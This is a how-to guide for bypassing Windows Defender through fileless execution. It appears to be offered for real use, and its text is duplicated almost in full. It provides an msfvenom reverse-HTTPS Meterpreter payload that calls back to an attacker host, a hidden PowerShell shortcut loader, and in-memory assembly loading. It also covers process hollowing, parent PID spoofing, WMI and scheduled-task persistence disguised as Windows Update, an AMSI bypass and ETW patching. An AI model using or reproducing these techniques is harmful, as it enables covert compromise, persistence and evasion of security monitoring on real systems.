Bypassing Modern Windows Defender: A Real-World Guide to Fileless Execution
Introduction:
Modern AV solutions like Windows Defender have become increasingly effective at detecting traditional malware. This guide demonstrates a real, fileless execution method that evades detection by leveraging living-off-the-land binaries (LOLBins) and in-memory techniques.
Requirements:
- Initial access (RDP, phishing, etc.)
- Basic knowledge of PowerShell
- No third-party tools required
STEP 1: Understanding the Technique
We'll abuse certutil.exe (Microsoft-signed binary) to decode and execute a payload directly in memory, leaving no traces on disk.
STEP 2: The Attack Chain
1. Generate Payload (Bash):
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=your_ip LPORT=443 -f raw | base64 -w 0 > payload.b64
2. Create Malicious LNK File (cmd)
Paste this into a shortcut's target field:
powershell -w hidden -c "iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((certutil -decode payload.b64 | Out-String))))"
3. Execute Filelessly (powershell):
$encoded = "BASE64_ENCODED_PAYLOAD_HERE"
$decoded = [System.Convert]::FromBase64String($encoded)
$assembly = [System.Reflection.Assembly]::Load($decoded)
$entryPoint = $assembly.EntryPoint
$entryPoint.Invoke($null, @(,[string[]] @()))
STEP 3: Obfuscation & Evasion
1. Process Hollowing (powershell)
$proc = Start-Process -FilePath "C:\Windows\System32\notepad.exe" -WindowStyle Hidden -PassThru
[IntPtr]$addr = [Your_Native_API_Calls_Here]
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $addr, $shellcode.Length)
$thread = [Your_Native_API_Calls_Here]
2. Parent PID Spoofing (powershell):
$parent = Get-Process -Name "explorer"
$startup = New-Object -TypeName "STARTUPINFO"
$startup.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($startup)
[Your_Native_API_Calls_Here] -ProcessHandle $parent.Handle -StartupInfo $startup
STEP 4: Persistence Techniques
1. WMI Event Subscription (powershell):
$filterArgs = @{
EventNamespace = 'root\subscription'
Name = "WindowsUpdateFilter"
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
QueryLanguage = "WQL"
}
$filter = Set-WmiInstance -Namespace "root\subscription" -Class "__EventFilter" -Arguments $filterArgs
$consumerArgs = @{
Name = "WindowsUpdateConsumer"
CommandLineTemplate = "powershell.exe -nop -w hidden -c \"iex([System.IO.File]::ReadAllText('C:\Users\Public\script.ps1'))\""
}
$consumer = Set-WmiInstance -Namespace "root\subscription" -Class "CommandLineEventConsumer" -Arguments $consumerArgs
Set-WmiInstance -Namespace "root\subscription" -Class "__FilterToConsumerBinding" -Arguments @{
Filter = $filter
Consumer = $consumer
}
2. Hidden Scheduled Task (powershell):
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-nop -w hidden -enc BASE64_ENCODED_SCRIPT"
$trigger = New-ScheduledTaskTrigger -AtLogOn
$settings = New-ScheduledTaskSettingsSet -Hidden -DontStopOnIdleEnd
Register-ScheduledTask -TaskName "WindowsUpdateTask" -Action $action -Trigger $trigger -Settings $settings
Detection Avoidance
1. AMSI Bypass (Must be first in script (powershell):
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
2. ETW Patching (Prevents logging) (powershell):
$etw = [Ref].Assembly.GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance')
$etw.SetValue([System.Diagnostics.Eventing.EventProvider].new(), 0)
Considerations:
Test first: Behavior varies across Windows 10/11 versions
Update regularly: Microsoft patches LOLBin abuse techniques
Combine techniques: Layer multiple evasion methods for better results
Final note:
This works as of Windows 11 23H2.
Defender updates may require technique modifications.
Modern AV solutions like Windows Defender have become increasingly effective at detecting traditional malware. This guide demonstrates a real, fileless execution method that evades detection by leveraging living-off-the-land binaries (LOLBins) and in-memory techniques.
Requirements:
- Initial access (RDP, phishing, etc.)
- Basic knowledge of PowerShell
- No third-party tools required
STEP 1: Understanding the Technique
We'll abuse certutil.exe (Microsoft-signed binary) to decode and execute a payload directly in memory, leaving no traces on disk.
STEP 2: The Attack Chain
1. Generate Payload (Bash):
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=your_ip LPORT=443 -f raw | base64 -w 0 > payload.b64
2. Create Malicious LNK File (cmd)
Paste this into a shortcut's target field:
powershell -w hidden -c "iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((certutil -decode payload.b64 | Out-String))))"
3. Execute Filelessly (powershell):
$encoded = "BASE64_ENCODED_PAYLOAD_HERE"
$decoded = [System.Convert]::FromBase64String($encoded)
$assembly = [System.Reflection.Assembly]::Load($decoded)
$entryPoint = $assembly.EntryPoint
$entryPoint.Invoke($null, @(,[string[]] @()))
STEP 3: Obfuscation & Evasion
1. Process Hollowing (powershell)
$proc = Start-Process -FilePath "C:\Windows\System32\notepad.exe" -WindowStyle Hidden -PassThru
[IntPtr]$addr = [Your_Native_API_Calls_Here]
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $addr, $shellcode.Length)
$thread = [Your_Native_API_Calls_Here]
2. Parent PID Spoofing (powershell):
$parent = Get-Process -Name "explorer"
$startup = New-Object -TypeName "STARTUPINFO"
$startup.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($startup)
[Your_Native_API_Calls_Here] -ProcessHandle $parent.Handle -StartupInfo $startup
STEP 4: Persistence Techniques
1. WMI Event Subscription (powershell):
$filterArgs = @{
EventNamespace = 'root\subscription'
Name = "WindowsUpdateFilter"
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
QueryLanguage = "WQL"
}
$filter = Set-WmiInstance -Namespace "root\subscription" -Class "__EventFilter" -Arguments $filterArgs
$consumerArgs = @{
Name = "WindowsUpdateConsumer"
CommandLineTemplate = "powershell.exe -nop -w hidden -c \"iex([System.IO.File]::ReadAllText('C:\Users\Public\script.ps1'))\""
}
$consumer = Set-WmiInstance -Namespace "root\subscription" -Class "CommandLineEventConsumer" -Arguments $consumerArgs
Set-WmiInstance -Namespace "root\subscription" -Class "__FilterToConsumerBinding" -Arguments @{
Filter = $filter
Consumer = $consumer
}
2. Hidden Scheduled Task (powershell):
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-nop -w hidden -enc BASE64_ENCODED_SCRIPT"
$trigger = New-ScheduledTaskTrigger -AtLogOn
$settings = New-ScheduledTaskSettingsSet -Hidden -DontStopOnIdleEnd
Register-ScheduledTask -TaskName "WindowsUpdateTask" -Action $action -Trigger $trigger -Settings $settings
Detection Avoidance
1. AMSI Bypass (Must be first in script (powershell):
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
2. ETW Patching (Prevents logging) (powershell):
$etw = [Ref].Assembly.GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance')
$etw.SetValue([System.Diagnostics.Eventing.EventProvider].new(), 0)
Considerations:
Test first: Behavior varies across Windows 10/11 versions
Update regularly: Microsoft patches LOLBin abuse techniques
Combine techniques: Layer multiple evasion methods for better results
Final note:
This works as of Windows 11 23H2.
Defender updates may require technique modifications.